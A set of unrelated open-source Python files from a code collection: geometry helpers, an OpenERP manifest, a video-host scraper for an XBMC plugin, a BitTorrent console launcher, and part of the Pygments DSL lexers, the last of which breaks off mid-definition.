"""Inset the rectangle by dx, dy on all sides."""
return xMin+dx, yMin+dy, xMax-dx, yMax-dy
def sectRect((xMin1, yMin1, xMax1, yMax1), (xMin2, yMin2, xMax2, yMax2)):
"""Return a boolean and a rectangle. If the input rectangles intersect, return
True and the intersecting rectangle. Return False and (0, 0, 0, 0) if the input
rectangles don't intersect.
"""
xMin, yMin, xMax, yMax = (max(xMin1, xMin2), max(yMin1, yMin2),
min(xMax1, xMax2), min(yMax1, yMax2))
if xMin >= xMax or yMin >= yMax:
return 0, (0, 0, 0, 0)
return 1, (xMin, yMin, xMax, yMax)
def unionRect((xMin1, yMin1, xMax1, yMax1), (xMin2, yMin2, xMax2, yMax2)):
"""Return the smallest rectangle in which both input rectangles are fully
enclosed. In other words, return the total bounding rectangle of both input
rectangles.
"""
xMin, yMin, xMax, yMax = (min(xMin1, xMin2), min(yMin1, yMin2),
max(xMax1, xMax2), max(yMax1, yMax2))
return (xMin, yMin, xMax, yMax)
def rectCenter((xMin, yMin, xMax, yMax)):
"""Return the center of the rectangle as an (x, y) coordinate."""
return (xMin+xMax)/2, (yMin+yMax)/2
def intRect((xMin, yMin, xMax, yMax)):
"""Return the rectangle, rounded off to integer values, but guaranteeing that
the resulting rectangle is NOT smaller than the original.
"""
import math
xMin = int(math.floor(xMin))
yMin = int(math.floor(yMin))
xMax = int(math.ceil(xMax))
yMax = int(math.ceil(yMax))
return (xMin, yMin, xMax, yMax)
def _test():
"""
>>> import math
>>> calcBounds([(0, 40), (0, 100), (50, 50), (80, 10)])
(0, 10, 80, 100)
>>> updateBounds((0, 0, 0, 0), (100, 100))
(0, 0, 100, 100)
>>> pointInRect((50, 50), (0, 0, 100, 100))
True
>>> pointInRect((0, 0), (0, 0, 100, 100))
True
>>> pointInRect((100, 100), (0, 0, 100, 100))
True
>>> not pointInRect((101, 100), (0, 0, 100, 100))
True
>>> list(pointsInRect([(50, 50), (0, 0), (100, 100), (101, 100)], (0, 0, 100, 100)))
[True, True, True, False]
>>> vectorLength((3, 4))
5.0
>>> vectorLength((1, 1)) == math.sqrt(2)
True
>>> list(asInt16([0, 0.1, 0.5, 0.9]))
[0, 0, 1, 1]
>>> normRect((0, 10, 100, 200))
(0, 10, 100, 200)
>>> normRect((100, 200, 0, 10))
(0, 10, 100, 200)
>>> scaleRect((10, 20, 50, 150), 1.5, 2)
(15.0, 40, 75.0, 300)
>>> offsetRect((10, 20, 30, 40), 5, 6)
(15, 26, 35, 46)
>>> insetRect((10, 20, 50, 60), 5, 10)
(15, 30, 45, 50)
>>> insetRect((10, 20, 50, 60), -5, -10)
(5, 10, 55, 70)
>>> intersects, rect = sectRect((0, 10, 20, 30), (0, 40, 20, 50))
>>> not intersects
True
>>> intersects, rect = sectRect((0, 10, 20, 30), (5, 20, 35, 50))
>>> intersects
1
>>> rect
(5, 20, 20, 30)
>>> unionRect((0, 10, 20, 30), (0, 40, 20, 50))
(0, 10, 20, 50)
>>> rectCenter((0, 0, 100, 200))
(50, 100)
>>> rectCenter((0, 0, 100, 199.0))
(50, 99.5)
>>> intRect((0.9, 2.9, 3.1, 4.1))
(0, 2, 4, 5)
"""
if __name__ == "__main__":
import doctest
doctest.testmod()
| bsd-3-clause |
ttfseiko/openerp-trunk | openerp/addons/decimal_precision/__openerp__.py | 179 | 1721 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Decimal Precision Configuration',
'description': """
Configure the price accuracy you need for different kinds of usage: accounting, sales, purchases.
=================================================================================================
The decimal precision is configured per company.
""",
'author': 'OpenERP SA',
'version': '0.1',
'depends': ['base'],
'category' : 'Hidden/Dependency',
'data': [
'decimal_precision_view.xml',
'security/ir.model.access.csv',
],
'demo': [],
'installable': True,
'images': ['images/1_decimal_accuracy_form.jpeg','images/1_decimal_accuracy_list.jpeg'],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
jose36/plugin.video.ProyectoLuzDigital | servers/upafile.py | 35 | 3133 | # -*- coding: utf-8 -*-
#------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# Conector para upafile
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
#------------------------------------------------------------
import urlparse,urllib2,urllib,re
import os
from core import scrapertools
from core import logger
from core import config
from core import unpackerjs
def test_video_exists( page_url ):
return True,""
def get_video_url( page_url , premium = False , user="" , password="", video_password="" ):
logger.info("[upafile.py] get_video_url(page_url='%s')" % page_url)
video_urls = []
data = scrapertools.cache_page(page_url)
#<script type='text/javascript'>eval(function(p,a,c,k,e,d){while(c--)if(k[c])p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c]);return p}('11 0=10 z(\'2://4.3/6/6.y\',\'6\',\'x\',\'w\',\'9\');0.5(\'v\',\'u\');0.5(\'t\',\'s\');0.5(\'r\',\'q\');0.1(\'p\',\'\');0.1(\'o\',\'2://a.4.3:n/d/m/8.l\');0.1(\'k\',\'2://a.4.3/i/j/h.g\');0.1(\'7\',\'8\');0.1(\'7\',\'2\');0.1(\'2.f\',\'e\');0.c(\'b\');',36,38,'s1|addVariable|http|com|upafile|addParam|player|provider|video||s82|flvplayer|write||start|startparam|jpg|idyoybh552bf||00024|image|mp4|k65ufdsgg7pvam5r5o22urriqvsqzkkf4cu3biws2xwxsvgmrfmjyfbz|182|file|duration|opaque|wmode|always|allowscriptaccess|true|allowfullscreen|400|500|swf|SWFObject|new|var'.split('|')))
patron = "<script type='text/javascript'>(eval\(function\(p,a,c,k,e,d\).*?)</script>"
matches = re.compile(patron,re.DOTALL).findall(data)
cifrado=""
for match in matches:
logger.info("match="+match)
if "mp4" in match or "flv" in match or "video" in match:
cifrado = match
break
# Extrae la URL del vídeo
logger.info("cifrado="+cifrado)
descifrado = unpackerjs.unpackjs(cifrado)
descifrado = descifrado.replace("\\","")
logger.info("descifrado="+descifrado)
#s1.addVariable('file','http://s82.upafile.com:182/d/k65ufdsgg7pvam5r5o22urriqvsqzkkf4cu3biws2xwxsvgmrfkxwzx4/video.mp4')
media_url = scrapertools.get_match(descifrado,"addVariable\('file','([^']+)'")
if len(matches)>0:
video_urls.append( [ scrapertools.get_filename_from_url(media_url)[-4:]+" [upafile]",media_url])
for video_url in video_urls:
logger.info("[upafile.py] %s - %s" % (video_url[0],video_url[1]))
return video_urls
# Encuentra vídeos del servidor en el texto pasado
def find_videos(data):
encontrados = set()
devuelve = []
#http://upafile.com/idyoybh552bf
data = urllib.unquote(data)
patronvideos = '(upafile.com/[a-z0-9]+)'
logger.info("[upafile.py] find_videos #"+patronvideos+"#")
matches = re.compile(patronvideos,re.DOTALL).findall(data)
for match in matches:
titulo = "[upafile]"
url = "http://"+match
if url not in encontrados:
logger.info(" url="+url)
devuelve.append( [ titulo , url , 'upafile' ] )
encontrados.add(url)
else:
logger.info(" url duplicada="+url)
return devuelve
| apache-2.0 |
sparkslabs/kamaelia | Sketches/RJL/bittorrent/BitTorrent/launchmany-console.py | 4 | 2524 | #!/usr/bin/env python
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by John Hoffman
if __name__ == '__main__':
from BitTorrent.platform import install_translation
install_translation()
import sys
import os
from BitTorrent.launchmanycore import LaunchMany
from BitTorrent.defaultargs import get_defaults
from BitTorrent.parseargs import parseargs, printHelp
from BitTorrent import configfile
from BitTorrent import version
from BitTorrent import BTFailure
exceptions = []
class HeadlessDisplayer:
def display(self, data):
print ''
if not data:
self.message(_("no torrents"))
for x in data:
( name, status, progress, peers, seeds, seedsmsg, dist,
uprate, dnrate, upamt, dnamt, size, t, msg ) = x
print '"%s": "%s" (%s) - %sP%s%s%.3fD u%0.1fK/s-d%0.1fK/s u%dK-d%dK "%s"' % (
name, status, progress, peers, seeds, seedsmsg, dist,
uprate/1000, dnrate/1000, upamt/1024, dnamt/1024, msg)
return False
def message(self, s):
print "### "+s
def exception(self, s):
exceptions.append(s)
self.message(_("SYSTEM ERROR - EXCEPTION GENERATED"))
if __name__ == '__main__':
uiname = 'launchmany-console'
defaults = get_defaults(uiname)
try:
if len(sys.argv) < 2:
printHelp(uiname, defaults)
sys.exit(1)
config, args = configfile.parse_configuration_and_args(defaults,
uiname, sys.argv[1:], 0, 1)
if args:
config['torrent_dir'] = args[0]
if not os.path.isdir(config['torrent_dir']):
raise BTFailure(_("Warning: ")+args[0]+_(" is not a directory"))
except BTFailure, e:
print _("error: %s\nrun with no args for parameter explanations") % str(e)
sys.exit(1)
LaunchMany(config, HeadlessDisplayer(), 'launchmany-console')
if exceptions:
print _("\nEXCEPTION:")
print exceptions[0]
| apache-2.0 |
unreal666/outwiker | plugins/markdown/markdown/markdown_plugin_libs/pygments/lexers/dsls.py | 6 | 33339 | # -*- coding: utf-8 -*-
"""
pygments.lexers.dsls
~~~~~~~~~~~~~~~~~~~~
Lexers for various domain-specific languages.
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import ExtendedRegexLexer, RegexLexer, bygroups, words, \
include, default, this, using, combined
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Literal, Whitespace
__all__ = ['ProtoBufLexer', 'BroLexer', 'PuppetLexer', 'RslLexer',
'MscgenLexer', 'VGLLexer', 'AlloyLexer', 'PanLexer',
'CrmshLexer', 'ThriftLexer', 'FlatlineLexer', 'SnowballLexer']
class ProtoBufLexer(RegexLexer):
"""
Lexer for `Protocol Buffer <http://code.google.com/p/protobuf/>`_
definition files.
.. versionadded:: 1.4
"""
name = 'Protocol Buffer'
aliases = ['protobuf', 'proto']
filenames = ['*.proto']
tokens = {
'root': [
(r'[ \t]+', Text),
(r'[,;{}\[\]()<>]', Punctuation),
(r'/(\\\n)?/(\n|(.|\n)*?[^\\]\n)', Comment.Single),
(r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment.Multiline),
(words((
'import', 'option', 'optional', 'required', 'repeated', 'default',
'packed', 'ctype', 'extensions', 'to', 'max', 'rpc', 'returns',
'oneof'), prefix=r'\b', suffix=r'\b'),
Keyword),
(words((
'int32', 'int64', 'uint32', 'uint64', 'sint32', 'sint64',
'fixed32', 'fixed64', 'sfixed32', 'sfixed64',
'float', 'double', 'bool', 'string', 'bytes'), suffix=r'\b'),
Keyword.Type),
(r'(true|false)\b', Keyword.Constant),
(r'(package)(\s+)', bygroups(Keyword.Namespace, Text), 'package'),
(r'(message|extend)(\s+)',
bygroups(Keyword.Declaration, Text), 'message'),
(r'(enum|group|service)(\s+)',
bygroups(Keyword.Declaration, Text), 'type'),
(r'\".*?\"', String),
(r'\'.*?\'', String),
(r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float),
(r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float),
(r'(\-?(inf|nan))\b', Number.Float),
(r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex),
(r'0[0-7]+[LlUu]*', Number.Oct),
(r'\d+[LlUu]*', Number.Integer),
(r'[+-=]', Operator),
(r'([a-zA-Z_][\w.]*)([ \t]*)(=)',
bygroups(Name.Attribute, Text, Operator)),
(r'[a-zA-Z_][\w.]*', Name),
],
'package': [
(r'[a-zA-Z_]\w*', Name.Namespace, '#pop'),
default('#pop'),
],
'message': [
(r'[a-zA-Z_]\w*', Name.Class, '#pop'),
default('#pop'),
],
'type': [
(r'[a-zA-Z_]\w*', Name, '#pop'),
default('#pop'),
],
}
class ThriftLexer(RegexLexer):
"""
For `Thrift <https://thrift.apache.org/>`__ interface definitions.
.. versionadded:: 2.1
"""
name = 'Thrift'
aliases = ['thrift']
filenames = ['*.thrift']
mimetypes = ['application/x-thrift']
tokens = {
'root': [
include('whitespace'),
include('comments'),
(r'"', String.Double, combined('stringescape', 'dqs')),
(r'\'', String.Single, combined('stringescape', 'sqs')),
(r'(namespace)(\s+)',
bygroups(Keyword.Namespace, Text.Whitespace), 'namespace'),
(r'(enum|union|struct|service|exception)(\s+)',
bygroups(Keyword.Declaration, Text.Whitespace), 'class'),
(r'((?:(?:[^\W\d]|\$)[\w.\[\]$<>]*\s+)+?)' # return arguments
r'((?:[^\W\d]|\$)[\w$]*)' # method name
r'(\s*)(\()', # signature start
bygroups(using(this), Name.Function, Text, Operator)),
include('keywords'),
include('numbers'),
(r'[&=]', Operator),
(r'[:;,{}()<>\[\]]', Punctuation),
(r'[a-zA-Z_](\.\w|\w)*', Name),
],
'whitespace': [
(r'\n', Text.Whitespace),
(r'\s+', Text.Whitespace),
],
'comments': [
(r'#.*$', Comment),
(r'//.*?\n', Comment),
(r'/\*[\w\W]*?\*/', Comment.Multiline),
],
'stringescape': [
(r'\\([\\nrt"\'])', String.Escape),
],
'dqs': [
(r'"', String.Double, '#pop'),
(r'[^\\"\n]+', String.Double),
],
'sqs': [
(r"'", String.Single, '#pop'),
(r'[^\\\'\n]+', String.Single),
],
'namespace': [
(r'[a-z*](\.\w|\w)*', Name.Namespace, '#pop'),
default('#pop'),
],
'class': [
(r'[a-zA-Z_]\w*', Name.Class, '#pop'),
default('#pop'),
],
'keywords': [
(r'(async|oneway|extends|throws|required|optional)\b', Keyword),
(r'(true|false)\b', Keyword.Constant),
(r'(const|typedef)\b', Keyword.Declaration),
(words((
'cpp_namespace', 'cpp_include', 'cpp_type', 'java_package',
'cocoa_prefix', 'csharp_namespace', 'delphi_namespace',
'php_namespace', 'py_module', 'perl_package',
'ruby_namespace', 'smalltalk_category', 'smalltalk_prefix',
'xsd_all', 'xsd_optional', 'xsd_nillable', 'xsd_namespace',
'xsd_attrs', 'include'), suffix=r'\b'),
Keyword.Namespace),
(words((
'void', 'bool', 'byte', 'i16', 'i32', 'i64', 'double',
'string', 'binary', 'map', 'list', 'set', 'slist',
'senum'), suffix=r'\b'),
Keyword.Type),
(words((
'BEGIN', 'END', '__CLASS__', '__DIR__', '__FILE__',
'__FUNCTION__', '__LINE__', '__METHOD__', '__NAMESPACE__',
'abstract', 'alias', 'and', 'args', 'as', 'assert', 'begin',
'break', 'case', 'catch', 'class', 'clone', 'continue',
'declare', 'def', 'default', 'del', 'delete', 'do', 'dynamic',
'elif', 'else', 'elseif', 'elsif', 'end', 'enddeclare',
'endfor', 'endforeach', 'endif', 'endswitch', 'endwhile',
'ensure', 'except', 'exec', 'finally', 'float', 'for',
'foreach', 'function', 'global', 'goto', 'if', 'implements',
'import', 'in', 'inline', 'instanceof', 'interface', 'is',
'lambda', 'module', 'native', 'new', 'next', 'nil', 'not',
'or', 'pass', 'public', 'print', 'private', 'protected',
'raise', 'redo', 'rescue', 'retry', 'register', 'return',
'self', 'sizeof', 'static', 'super', 'switch', 'synchronized',
'then', 'this', 'throw', 'transient', 'try', 'undef',
'unless', 'unsigned', 'until', 'use', 'var', 'virtual',
'volatile', 'when', 'while', 'with', 'xor', 'yield'),
prefix=r'\b', suffix=r'\b'),
Keyword.Reserved),
],
'numbers': [
(r'[+-]?(\d+\.\d+([eE][+-]?\d+)?|\.?\d+[eE][+-]?\d+)', Number.Float),
(r'[+-]?0x[0-9A-Fa-f]+', Number.Hex),
(r'[+-]?[0-9]+', Number.Integer),
],
}
class BroLexer(RegexLexer):
"""
For `Bro <http://bro-ids.org/>`_ scripts.
.. versionadded:: 1.5
"""
name = 'Bro'
aliases = ['bro']
filenames = ['*.bro']
_hex = r'[0-9a-fA-F_]'
_float = r'((\d*\.?\d+)|(\d+\.?\d*))([eE][-+]?\d+)?'
_h = r'[A-Za-z0-9][-A-Za-z0-9]*'
tokens = {
'root': [
# Whitespace
(r'^@.*?\n', Comment.Preproc),
(r'#.*?\n', Comment.Single),
(r'\n', Text),
(r'\s+', Text),
(r'\\\n', Text),
# Keywords
(r'(add|alarm|break|case|const|continue|delete|do|else|enum|event'
r'|export|for|function|if|global|hook|local|module|next'
r'|of|print|redef|return|schedule|switch|type|when|while)\b', Keyword),
(r'(addr|any|bool|count|counter|double|file|int|interval|net'
r'|pattern|port|record|set|string|subnet|table|time|timer'
r'|vector)\b', Keyword.Type),
(r'(T|F)\b', Keyword.Constant),
(r'(&)((?:add|delete|expire)_func|attr|(?:create|read|write)_expire'
r'|default|disable_print_hook|raw_output|encrypt|group|log'
r'|mergeable|optional|persistent|priority|redef'
r'|rotate_(?:interval|size)|synchronized)\b',
bygroups(Punctuation, Keyword)),
(r'\s+module\b', Keyword.Namespace),
# Addresses, ports and networks
(r'\d+/(tcp|udp|icmp|unknown)\b', Number),
(r'(\d+\.){3}\d+', Number),
(r'(' + _hex + r'){7}' + _hex, Number),
(r'0x' + _hex + r'(' + _hex + r'|:)*::(' + _hex + r'|:)*', Number),
(r'((\d+|:)(' + _hex + r'|:)*)?::(' + _hex + r'|:)*', Number),
(r'(\d+\.\d+\.|(\d+\.){2}\d+)', Number),
# Hostnames
(_h + r'(\.' + _h + r')+', String),
# Numeric
(_float + r'\s+(day|hr|min|sec|msec|usec)s?\b', Literal.Date),
(r'0[xX]' + _hex, Number.Hex),
(_float, Number.Float),
(r'\d+', Number.Integer),
(r'/', String.Regex, 'regex'),
(r'"', String, 'string'),
# Operators
(r'[!%*/+:<=>?~|-]', Operator),
(r'([-+=&|]{2}|[+=!><-]=)', Operator),
(r'(in|match)\b', Operator.Word),
(r'[{}()\[\]$.,;]', Punctuation),
# Identfier
(r'([_a-zA-Z]\w*)(::)', bygroups(Name, Name.Namespace)),
(r'[a-zA-Z_]\w*', Name)
],
'string': [
(r'"', String, '#pop'),
(r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape),
(r'[^\\"\n]+', String),
(r'\\\n', String),
(r'\\', String)
],
'regex': [
(r'/', String.Regex, '#pop'),
(r'\\[\\nt/]', String.Regex), # String.Escape is too intense here.
(r'[^\\/\n]+', String.Regex),
(r'\\\n', String.Regex),
(r'\\', String.Regex)
]
}
class PuppetLexer(RegexLexer):
"""
For `Puppet <http://puppetlabs.com/>`__ configuration DSL.
.. versionadded:: 1.6
"""
name = 'Puppet'
aliases = ['puppet']
filenames = ['*.pp']
tokens = {
'root': [
include('comments'),
include('keywords'),
include('names'),
include('numbers'),
include('operators'),
include('strings'),
(r'[]{}:(),;[]', Punctuation),
(r'[^\S\n]+', Text),
],
'comments': [
(r'\s*#.*$', Comment),
(r'/(\\\n)?[*](.|\n)*?[*](\\\n)?/', Comment.Multiline),
],
'operators': [
(r'(=>|\?|<|>|=|\+|-|/|\*|~|!|\|)', Operator),
(r'(in|and|or|not)\b', Operator.Word),
],
'names': [
(r'[a-zA-Z_]\w*', Name.Attribute),
(r'(\$\S+)(\[)(\S+)(\])', bygroups(Name.Variable, Punctuation,
String, Punctuation)),
(r'\$\S+', Name.Variable),
],
'numbers': [
# Copypasta from the Python lexer
(r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?j?', Number.Float),
(r'\d+[eE][+-]?[0-9]+j?', Number.Float),
(r'0[0-7]+j?', Number.Oct),
(r'0[xX][a-fA-F0-9]+', Number.Hex),
(r'\d+L', Number.Integer.Long),
(r'\d+j?', Number.Integer)
],
'keywords': [
# Left out 'group' and 'require'
# Since they're often used as attributes
(words((
'absent', 'alert', 'alias', 'audit', 'augeas', 'before', 'case',
'check', 'class', 'computer', 'configured', 'contained',
'create_resources', 'crit', 'cron', 'debug', 'default',
'define', 'defined', 'directory', 'else', 'elsif', 'emerg',
'err', 'exec', 'extlookup', 'fail', 'false', 'file',
'filebucket', 'fqdn_rand', 'generate', 'host', 'if', 'import',
'include', 'info', 'inherits', 'inline_template', 'installed',
'interface', 'k5login', 'latest', 'link', 'loglevel',
'macauthorization', 'mailalias', 'maillist', 'mcx', 'md5',
'mount', 'mounted', 'nagios_command', 'nagios_contact',
'nagios_contactgroup', 'nagios_host', 'nagios_hostdependency',
'nagios_hostescalation', 'nagios_hostextinfo', 'nagios_hostgroup',
'nagios_service', 'nagios_servicedependency', 'nagios_serviceescalation',
'nagios_serviceextinfo', 'nagios_servicegroup', 'nagios_timeperiod',
'node', 'noop', 'notice', 'notify', 'package', 'present', 'purged',
'realize', 'regsubst', 'resources', 'role', 'router', 'running',
'schedule', 'scheduled_task', 'search', 'selboolean', 'selmodule',
'service', 'sha1', 'shellquote', 'split', 'sprintf',
'ssh_authorized_key', 'sshkey', 'stage', 'stopped', 'subscribe',
'tag', 'tagged', 'template', 'tidy', 'true', 'undef', 'unmounted',
'user', 'versioncmp', 'vlan', 'warning', 'yumrepo', 'zfs', 'zone',
'zpool'), prefix='(?i)', suffix=r'\b'),
Keyword),
],
'strings': [
(r'"([^"])*"', String),
(r"'(\\'|[^'])*'", String),
],
}
class RslLexer(RegexLexer):
"""
`RSL <http://en.wikipedia.org/wiki/RAISE>`_ is the formal specification
language used in RAISE (Rigorous Approach to Industrial Software Engineering)
method.
.. versionadded:: 2.0
"""
name = 'RSL'
aliases = ['rsl']
filenames = ['*.rsl']
mimetypes = ['text/rsl']
flags = re.MULTILINE | re.DOTALL
tokens = {
'root': [
(words((
'Bool', 'Char', 'Int', 'Nat', 'Real', 'Text', 'Unit', 'abs',
'all', 'always', 'any', 'as', 'axiom', 'card', 'case', 'channel',
'chaos', 'class', 'devt_relation', 'dom', 'elems', 'else', 'elif',
'end', 'exists', 'extend', 'false', 'for', 'hd', 'hide', 'if',
'in', 'is', 'inds', 'initialise', 'int', 'inter', 'isin', 'len',
'let', 'local', 'ltl_assertion', 'object', 'of', 'out', 'post',
'pre', 'read', 'real', 'rng', 'scheme', 'skip', 'stop', 'swap',
'then', 'theory', 'test_case', 'tl', 'transition_system', 'true',
'type', 'union', 'until', 'use', 'value', 'variable', 'while',
'with', 'write', '~isin', '-inflist', '-infset', '-list',
'-set'), prefix=r'\b', suffix=r'\b'),
Keyword),
(r'(variable|value)\b', Keyword.Declaration),
(r'--.*?\n', Comment),
(r'<:.*?:>', Comment),
(r'\{!.*?!\}', Comment),
(r'/\*.*?\*/', Comment),
(r'^[ \t]*([\w]+)[ \t]*:[^:]', Name.Function),
(r'(^[ \t]*)([\w]+)([ \t]*\([\w\s,]*\)[ \t]*)(is|as)',
bygroups(Text, Name.Function, Text, Keyword)),
(r'\b[A-Z]\w*\b', Keyword.Type),
(r'(true|false)\b', Keyword.Constant),
(r'".*"', String),
(r'\'.\'', String.Char),
(r'(><|->|-m->|/\\|<=|<<=|<\.|\|\||\|\^\||-~->|-~m->|\\/|>=|>>|'
r'\.>|\+\+|-\\|<->|=>|:-|~=|\*\*|<<|>>=|\+>|!!|\|=\||#)',
Operator),
(r'[0-9]+\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float),
(r'0x[0-9a-f]+', Number.Hex),
(r'[0-9]+', Number.Integer),
(r'.', Text),
],
}
def analyse_text(text):
"""
Check for the most common text in the beginning of a RSL file.
"""
if re.search(r'scheme\s*.*?=\s*class\s*type', text, re.I) is not None:
return 1.0
class MscgenLexer(RegexLexer):
"""
For `Mscgen <http://www.mcternan.me.uk/mscgen/>`_ files.
.. versionadded:: 1.6
"""
name = 'Mscgen'
aliases = ['mscgen', 'msc']
filenames = ['*.msc']
_var = r'(\w+|"(?:\\"|[^"])*")'
tokens = {
'root': [
(r'msc\b', Keyword.Type),
# Options
(r'(hscale|HSCALE|width|WIDTH|wordwraparcs|WORDWRAPARCS'
r'|arcgradient|ARCGRADIENT)\b', Name.Property),
# Operators
(r'(abox|ABOX|rbox|RBOX|box|BOX|note|NOTE)\b', Operator.Word),
(r'(\.|-|\|){3}', Keyword),
(r'(?:-|=|\.|:){2}'
r'|<<=>>|<->|<=>|<<>>|<:>'
r'|->|=>>|>>|=>|:>|-x|-X'
r'|<-|<<=|<<|<=|<:|x-|X-|=', Operator),
# Names
(r'\*', Name.Builtin),
(_var, Name.Variable),
# Other
(r'\[', Punctuation, 'attrs'),
(r'\{|\}|,|;', Punctuation),
include('comments')
],
'attrs': [
(r'\]', Punctuation, '#pop'),
(_var + r'(\s*)(=)(\s*)' + _var,
bygroups(Name.Attribute, Text.Whitespace, Operator, Text.Whitespace,
String)),
(r',', Punctuation),
include('comments')
],
'comments': [
(r'(?://|#).*?\n', Comment.Single),
(r'/\*(?:.|\n)*?\*/', Comment.Multiline),
(r'[ \t\r\n]+', Text.Whitespace)
]
}
class VGLLexer(RegexLexer):
"""
For `SampleManager VGL <http://www.thermoscientific.com/samplemanager>`_
source code.
.. versionadded:: 1.6
"""
name = 'VGL'
aliases = ['vgl']
filenames = ['*.rpf']
flags = re.MULTILINE | re.DOTALL | re.IGNORECASE
tokens = {
'root': [
(r'\{[^}]*\}', Comment.Multiline),
(r'declare', Keyword.Constant),
(r'(if|then|else|endif|while|do|endwhile|and|or|prompt|object'
r'|create|on|line|with|global|routine|value|endroutine|constant'
r'|global|set|join|library|compile_option|file|exists|create|copy'
r'|delete|enable|windows|name|notprotected)(?! *[=<>.,()])',
Keyword),
(r'(true|false|null|empty|error|locked)', Keyword.Constant),
(r'[~^*#!%&\[\]()<>|+=:;,./?-]', Operator),
(r'"[^"]*"', String),
(r'(\.)([a-z_$][\w$]*)', bygroups(Operator, Name.Attribute)),
(r'[0-9][0-9]*(\.[0-9]+(e[+\-]?[0-9]+)?)?', Number),
(r'[a-z_$][\w$]*', Name),
(r'[\r\n]+', Text),
(r'\s+', Text)
]
}
class AlloyLexer(RegexLexer):
"""
For `Alloy <http://alloy.mit.edu>`_ source code.
.. versionadded:: 2.0
"""
name = 'Alloy'
aliases = ['alloy']
filenames = ['*.als']
mimetypes = ['text/x-alloy']
flags = re.MULTILINE | re.DOTALL
iden_rex = r'[a-zA-Z_][\w\']*'
text_tuple = (r'[^\S\n]+', Text)
tokens = {
'sig': [
(r'(extends)\b', Keyword, '#pop'),
(iden_rex, Name),
text_tuple,
(r',', Punctuation),
(r'\{', Operator, '#pop'),
],
'module': [
text_tuple,
(iden_rex, Name, '#pop'),
],
'fun': [
text_tuple,
(r'\{', Operator, '#pop'),
(iden_rex, Name, '#pop'),
],
'root': [
(r'--.*?$', Comment.Single),
(r'//.*?$', Comment.Single),
(r'/\*.*?\*/', Comment.Multiline),
text_tuple,
(r'(module|open)(\s+)', bygroups(Keyword.Namespace, Text),
'module'),
(r'(sig|enum)(\s+)', bygroups(Keyword.Declaration, Text), 'sig'),
(r'(iden|univ|none)\b', Keyword.Constant),
(r'(int|Int)\b', Keyword.Type),
(r'(this|abstract|extends|set|seq|one|lone|let)\b', Keyword),
(r'(all|some|no|sum|disj|when|else)\b', Keyword),
(r'(run|check|for|but|exactly|expect|as)\b', Keyword),
(r'(and|or|implies|iff|in)\b', Operator.Word),
(r'(fun|pred|fact|assert)(\s+)', bygroups(Keyword, Text), 'fun'),
(r'!|#|&&|\+\+|<<|>>|>=|<=>|<=|\.|->', Operator),
(r'[-+/*%=<>&!^|~{}\[\]().]', Operator),
(iden_rex, Name),
(r'[:,]', Punctuation),
(r'[0-9]+', Number.Integer),
(r'"(\\\\|\\"|[^"])*"', String),
(r'\n', Text),
]
}
class PanLexer(RegexLexer):
"""
Lexer for `pan <http://github.com/quattor/pan/>`_ source files.
Based on tcsh lexer.
.. versionadded:: 2.0
"""
name = 'Pan'
aliases = ['pan']
filenames = ['*.pan']
tokens = {
'root': [
include('basic'),
(r'\(', Keyword, 'paren'),
(r'\{', Keyword, 'curly'),
include('data'),
],
'basic': [
(words((
'if', 'for', 'with', 'else', 'type', 'bind', 'while', 'valid', 'final',
'prefix', 'unique', 'object', 'foreach', 'include', 'template',
'function', 'variable', 'structure', 'extensible', 'declaration'),
prefix=r'\b', suffix=r'\s*\b'),
Keyword),
(words((
'file_contents', 'format', 'index', 'length', 'match', 'matches',
'replace', 'splice', 'split', 'substr', 'to_lowercase', 'to_uppercase',
'debug', 'error', 'traceback', 'deprecated', 'base64_decode',
'base64_encode', 'digest', 'escape', 'unescape', 'append', 'create',
'first', 'nlist', 'key', 'list', 'merge', 'next', 'prepend', 'is_boolean',
'is_defined', 'is_double', 'is_list', 'is_long', 'is_nlist', 'is_null',
'is_number', 'is_property', 'is_resource', 'is_string', 'to_boolean',
'to_double', 'to_long', 'to_string', 'clone', 'delete', 'exists',
'path_exists', 'if_exists', 'return', 'value'),
prefix=r'\b', suffix=r'\s*\b'),
Name.Builtin),
(r'#.*', Comment),
(r'\\[\w\W]', String.Escape),
(r'(\b\w+)(\s*)(=)', bygroups(Name.Variable, Text, Operator)),
(r'[\[\]{}()=]+', Operator),
(r'<<\s*(\'?)\\?(\w+)[\w\W]+?\2', String),
(r';', Punctuation),
],
'data': [
(r'(?s)"(\\\\|\\[0-7]+|\\.|[^"\\])*"', String.Double),
(r"(?s)'(\\\\|\\[0-7]+|\\.|[^'\\])*'", String.Single),
(r'\s+', Text),
(r'[^=\s\[\]{}()$"\'`\\;#]+', Text),
(r'\d+(?= |\Z)', Number),
],
'curly': [
(r'\}', Keyword, '#pop'),
(r':-', Keyword),
